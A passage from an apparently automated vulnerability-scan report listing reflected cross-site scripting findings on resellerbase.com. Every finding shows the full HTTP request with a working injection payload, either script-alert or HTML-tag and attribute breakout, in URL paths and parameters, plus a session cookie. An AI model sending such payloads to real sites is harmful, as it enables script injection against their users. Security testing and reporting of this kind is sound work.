Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-informationd4697<script>alert(1)</script>e8dd8ceb3ff/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4111. http://www.resellerbase.com/resources-information/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2f4f6<script>alert(1)</script>9b6549ea7a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes2f4f6<script>alert(1)</script>9b6549ea7a4/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes2f4f6<script>alert(1)</script>9b6549ea7a4/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4112. http://www.resellerbase.com/resources-information/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f4bb7<script>alert(1)</script>e4252ba3c8e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmosf4bb7<script>alert(1)</script>e4252ba3c8e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:54:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmosf4bb7<script>alert(1)</script>e4252ba3c8e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4113. http://www.resellerbase.com/resources-information/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 924e6<script>alert(1)</script>c9e64707c87 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/search.php924e6<script>alert(1)</script>c9e64707c87?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:54:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/search.php924e6<script>alert(1)</script>c9e64707c87?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4114. http://www.resellerbase.com/resources-information/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload a4d37<a>827316afbe was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/themes/kosmos/search.php?keyword=search...&Submit3=Searcha4d37<a>827316afbe&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/search.php?keyword=search...&Submit3=Searcha4d37<a>827316afbe&opt=2 was not found on this server.</p>
...[SNIP]...

2.4115. http://www.resellerbase.com/resources-information/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 8fbf1<a>0842804e886 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/themes/kosmos/search.php?keyword=search...8fbf1<a>0842804e886&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/search.php?keyword=search...8fbf1<a>0842804e886&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4116. http://www.resellerbase.com/resources-information/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5c533<script>alert(1)</script>f45bf6e4e70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&5c533<script>alert(1)</script>f45bf6e4e70=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&5c533<script>alert(1)</script>f45bf6e4e70=1 was not found on this server.</p>
...[SNIP]...

2.4117. http://www.resellerbase.com/resources-information/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 92aca<a>c8fb9779ad3 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=292aca<a>c8fb9779ad3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=292aca<a>c8fb9779ad3 was not found on this server.</p>
...[SNIP]...

2.4118. http://www.resellerbase.com/resources-information/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 45302<script>alert(1)</script>70839b1ad7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information45302<script>alert(1)</script>70839b1ad7d/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information45302<script>alert(1)</script>70839b1ad7d/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4119. http://www.resellerbase.com/resources-information/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b504b<script>alert(1)</script>c5571b8e513 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themesb504b<script>alert(1)</script>c5571b8e513/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themesb504b<script>alert(1)</script>c5571b8e513/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4120. http://www.resellerbase.com/resources-information/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload df0cd<script>alert(1)</script>2fb37770498 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/search.phpdf0cd<script>alert(1)</script>2fb37770498?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/search.phpdf0cd<script>alert(1)</script>2fb37770498?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4121. http://www.resellerbase.com/resources-information/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 9650c<a>e2c439f9a23 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/themes/search.php?keyword=search...&Submit3=Search9650c<a>e2c439f9a23&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/search.php?keyword=search...&Submit3=Search9650c<a>e2c439f9a23&opt=2 was not found on this server.</p>
...[SNIP]...

2.4122. http://www.resellerbase.com/resources-information/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 60a34<a>7c813667560 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/themes/search.php?keyword=search...60a34<a>7c813667560&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/search.php?keyword=search...60a34<a>7c813667560&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4123. http://www.resellerbase.com/resources-information/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 18312<script>alert(1)</script>b49b34fbc68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/search.php?keyword=search...&Submit3=Search&opt=2&18312<script>alert(1)</script>b49b34fbc68=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/search.php?keyword=search...&Submit3=Search&opt=2&18312<script>alert(1)</script>b49b34fbc68=1 was not found on this server.</p>
...[SNIP]...

2.4124. http://www.resellerbase.com/resources-information/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload e5600<a>d8f3053dd2 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/themes/search.php?keyword=search...&Submit3=Search&opt=2e5600<a>d8f3053dd2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/search.php?keyword=search...&Submit3=Search&opt=2e5600<a>d8f3053dd2 was not found on this server.</p>
...[SNIP]...

2.4125. http://www.resellerbase.com/review.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /review.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5832<script>alert(1)</script>2ca17452d50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /review.phpa5832<script>alert(1)</script>2ca17452d50 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php?id=555-555-0199@example.com&pflag=view&submit=Submit
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:05:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /review.phpa5832<script>alert(1)</script>2ca17452d50 was not found on this server.</p>
...[SNIP]...

2.4126. http://www.resellerbase.com/review.php [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /review.php

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9563"><a>94d3761ed57 was submitted in the id parameter. This input was echoed as d9563\"><a>94d3761ed57 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /review.php?id=29d9563"><a>94d3761ed57 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php?pr=5
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/review.php?id=29d9563\"><a>94d3761ed57" />
...[SNIP]...

2.4127. http://www.resellerbase.com/review.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /review.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5b05"><a>68982b7eaf0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c5b05\"><a>68982b7eaf0 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /review.php?c5b05"><a>68982b7eaf0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php?id=555-555-0199@example.com&pflag=view&submit=Submit
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9230

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/review.php?c5b05\"><a>68982b7eaf0=1" />
...[SNIP]...

2.4128. http://www.resellerbase.com/review.php [rating parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /review.php

Issue detail

The value of the rating request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74c24"><a>496b74a6ee9 was submitted in the rating parameter. This input was echoed as 74c24\"><a>496b74a6ee9 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /review.php?id=555-555-0199@example.com&rating=474c24"><a>496b74a6ee9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
